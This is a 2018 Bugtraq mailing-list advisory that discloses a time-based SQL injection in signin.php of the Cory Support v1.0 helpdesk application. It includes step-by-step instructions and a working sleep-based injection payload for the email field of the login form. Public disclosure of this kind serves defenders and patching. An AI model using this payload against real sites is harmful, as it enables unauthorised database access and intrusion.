
Date: Thu, 22 Nov 2018 23:46:52 GMT
From: Socket_0x03@...aexe.com
To: bugtraq@...urityfocus.com
Subject: Cory Support v1.0 - Time-Based SQL Injection in Signin



             ============================================================
             Cory Support v1.0 - Time-Based SQL Injection in 'signin.php'
             ============================================================

____________________________________________________________________________________


 # Exploit Title: Cory Support v1.0 - Time-Based SQL Injection in 'signin.php'

 # Date: [11-22-2018]

 # Category: Webapps

____________________________________________________________________________________


 # Author: Socket_0x03 (Alvaro J. Gene)

 # Email: Socket_0x03 (at) teraexe (dot) com

 # Website: www.teraexe.com

____________________________________________________________________________________


 # Software Link: https://sourceforge.net/projects/corysupport

 # Vulnerable Application: Cory Support

 # Version: 1.0

 # Vulnerable File: signin.php

 # Parameter: stremail

 # Language: This application is available in English language.

 # Product Description: Cory Support is an application developed on PHP that a
   webmaster or administrator can use as a support system (helpdesk) for his/her
   customers. In this app, a customer will be able to submit a ticket or request,
   and an admin can use Cory Support to manage those tickets or requests.
   
____________________________________________________________________________________


 #  Time-Based SQL Injection:

        First, go to the login panel:
        https://www.website.com/support/signin.php
        Second, type the SQL injection:
        Email: (sleep(5)+1) limit 1 -- '+(select*from(select(sleep(10)))a)+'
        Password: password
        Finally, click on OK.
